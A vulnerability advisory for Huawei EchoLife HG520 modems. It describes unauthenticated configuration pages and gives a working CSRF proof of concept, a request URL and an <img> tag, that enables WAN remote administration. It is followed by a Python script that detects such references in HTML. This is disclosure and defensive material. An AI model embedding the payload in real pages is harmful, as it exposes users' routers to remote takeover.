Critical May 29, 2010

Huawei EchoLife HG520 Remote Management CSRF

Huawei EchoLife HG520 modems do not require authentication to access certain pages such as: '/Forms/access_cwmp_1', '/Forms/rpQos_1' and '/Forms/rpRManage_1'. A CSRF exploit can be used to enable remote administration interfaces on the WAN.

CVSS Score: 9.6 / 10.0
Severity: Critical
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Advisory

Device: Huawei EchoLife HG520
Vulnerable Models: HG520c, HG520b
Firmware: 3.10.18.7-1.0.7.0, 3.10.18.5-1.0.7.0
Software: V100R001B021Telmex, V100R001B020Telmex
Impact: Enable remote admin over WAN
Websec Advisory: WS10-12

Description

Huawei EchoLife HG520 modems do not require authentication for certain configuration pages, including /Forms/access_cwmp_1, /Forms/rpQos_1, and /Forms/rpRManage_1. A CSRF payload can be used to enable the remote administration interfaces on the WAN.

Exploit / Proof of Concept

Enable FTP, Telnet, and HTTP remote admin by requesting:

http://192.168.1.254/Forms/rpRManage_1?ACL_active=0

Client-side CSRF payload:

<img src="http://192.168.1.254/Forms/rpRManage_1?ACL_active=0">

Remediation

No vendor fix. Users should not browse untrusted sites while logged into the modem web UI; disable remote admin.
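
A detection aid, added here and not part of the original advisory: it scans HTML (for example in a filtering proxy or mail gateway) for embedded resources that point at a private-address host and one of the three unauthenticated paths named above. The function names, the attribute list and the sample markup are assumptions constructed for illustration.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Unauthenticated configuration paths named in the advisory.
ADVISORY_PATHS = {"/Forms/access_cwmp_1", "/Forms/rpQos_1", "/Forms/rpRManage_1"}
# Attributes that make a browser fetch or submit to a URL.
URL_ATTRS = {"src", "href", "action", "data", "background"}


def matches_advisory(value):
    """True if value is a URL to a private-address host and an advisory path."""
    try:
        url = urlsplit(value.strip())
        host = ipaddress.ip_address(url.hostname or "")
    except ValueError:
        return False  # malformed URL or non-literal hostname: out of scope here
    return (host.is_private or host.is_link_local) and url.path in ADVISORY_PATHS


class _RefCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and matches_advisory(value):
                self.hits.append((tag, name, value.strip()))


def find_router_csrf_refs(html):
    """Return (tag, attribute, url) for each embedded reference that matches."""
    collector = _RefCollector()
    collector.feed(html)
    collector.close()
    return collector.hits


# Constructed sample page: only the second <img> should be reported.
SAMPLE = """
<img src="https://example.com/logo.png">
<img src="http://192.168.1.254/Forms/rpRManage_1?ACL_active=0">
<a href="http://192.168.1.254/index.html">router</a>
"""

if __name__ == "__main__":
    for hit in find_router_csrf_refs(SAMPLE):
        print(hit)
```

The match is limited to literal IP addresses and exact paths; a hostname that resolves to the modem's address is not covered by this check.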
